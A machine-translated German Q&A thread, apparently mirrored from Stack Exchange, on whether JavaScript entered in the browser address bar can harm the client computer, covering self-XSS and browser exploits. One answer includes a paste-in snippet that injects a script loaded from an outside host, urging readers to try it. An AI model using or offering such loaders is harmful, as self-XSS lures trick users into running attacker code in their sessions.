it-swarm.com.de

Kann die Ausführung von Javascript über die Adressleiste den Computer des Clients beschädigen?

Stellt die JavaScript-Ausführung über die Adressleiste angesichts der Tatsache, dass moderne Browser heutzutage den Zugriff von JavaScript auf Ressourcen auf dem Client-Computer untersagen, überhaupt eine Bedrohung für den Client-Computer dar (den Computer, auf dem der Browser ausgeführt wird)?

21
gurvinder372

Das über die Adressleiste ausgeführte JavaScript wird im Kontext der auf dieser Registerkarte angezeigten Website ausgeführt. Dies bedeutet vollständigen Zugriff auf diese Website und kann das Aussehen und Verhalten der Website aus Sicht des Benutzers ändern.

Dieser Angriff heißt self XSS und kann dem Benutzer und indirekt dem Computer Schaden zufügen. Eine seriöse Website kann den Benutzer auffordern, einen schädlichen ausführbaren Code herunterzuladen und zu installieren, indem er beispielsweise vorgibt, ein Flash-Update zu benötigen.

Um ein schönes visuelles Beispiel dafür zu erhalten, geben Sie manuell javascript: In Ihre Adressleiste ein und fügen Sie Folgendes ein: z=document.createElement("script");z.src="https://peniscorp.com/topkek.js"; document.body.appendChild(z); Wenn Sie mir nicht vertrauen, tun Sie dies in der Adressleiste einer Website Du bist nicht eingeloggt.

Die meisten Browser haben erkannt diese Sicherheitsanfälligkeit und versuchen, die Auswirkungen zu begrenzen, indem sie javascript: Ausschneiden, wenn Sie javascript:some_js_code In die Adressleiste einfügen. Es ist jedoch weiterhin möglich, es manuell zu schreiben und auszuführen.

27
Cristian Dobre

Ich möchte die akzeptierte Antwort von Cristian Dobre vervollständigen, die korrekt, aber unvollständig ist.

Das Ausführen von Javascript (ob über eine Adressleiste oder über klassischere Mittel spielt hier keine Rolle) kann in einigen Fällen zur Remotecodeausführung führen, indem Pufferüberläufe (oder ähnliche Fehler) in Browsern ausgenutzt werden. Dies ist einer der Gründe, warum das regelmäßige Patchen von Browsern sehr wichtig ist.

Solche Vorkommen werden selten in freier Wildbahn entdeckt, existieren jedoch, und jedes Jahr werden neue entdeckt (Chrome hatte in der Vergangenheit weniger als Firefox, das WENIGER WENIGER als IE ist).

Ein gutes Beispiel hier auf SO: https://stackoverflow.com/questions/381171/help-me-understand-this-javascript-exploit

Um Ihre Frage zu beantworten: Ja, es kann den Computer eines Kunden beschädigen. Wenn die Maschine vollständig gepatcht ist, kann nur ein Zero-Day (äußerst unwahrscheinlich, aber technisch immer noch möglich) einen solchen Schaden anrichten. Zero-Days mit einer solchen Leistung werden meistens "zum Glück" für gezielte Angriffe verwendet, um Aufmerksamkeit zu vermeiden und die Wahrscheinlichkeit einer Nichterkennung (und damit einer zukünftigen Wiederverwendung) zu maximieren.

6
niilzon